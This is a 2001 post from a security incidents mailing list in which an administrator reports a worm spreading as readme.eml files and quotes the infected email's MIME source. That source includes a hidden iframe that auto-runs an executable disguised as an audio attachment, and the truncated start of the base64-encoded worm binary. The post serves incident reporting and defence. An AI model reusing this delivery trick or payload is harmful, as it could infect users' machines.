Security Incidents mailing list archives
RE: New worm? 'readme.eml'
From: Mark Ng <hostmaster () qpp co uk>
Date: Tue, 18 Sep 2001 16:51:00 +0100
I've just seen this infest an NT share. I've isolated it to one drive (this machine is a fileserver with no access of it's own to the internet.) Further following behaviour, this worm copies itself into available directories, (I think using a client machine, as this is restricted to one drive only one department has access to) naming itself the same as other files in that directory, except as a .eml . Upon opening in a text editor, the same content as described below by Pedro appears.
When I connected to the originating server (femm.tdkomm.com.br), I saw the normal web page for the institution, plus a pop-up window for http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as follows: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW 4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJ mqSzxytU88cbVO PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UE UAAEwBBQB1Oqc7 AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEA AAABAAAAQAAAAA ... (worm code follows) I've inspected the executable code, and it reads like a worm. (doh) Has anyone seen this?
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New worm? 'readme.eml' Pedro Miller Rabinovitch (Sep 18)
- Re: New worm? 'readme.eml' Christopher X. Candreva (Sep 18)
- Re: New worm? 'readme.eml' Tony Abedini (Sep 18)
- <Possible follow-ups>
- Re: New worm? 'readme.eml' coop (Sep 18)
- RE: New worm? 'readme.eml' Mark Ng (Sep 18)
- Re: New worm? 'readme.eml' Christopher X. Candreva (Sep 18)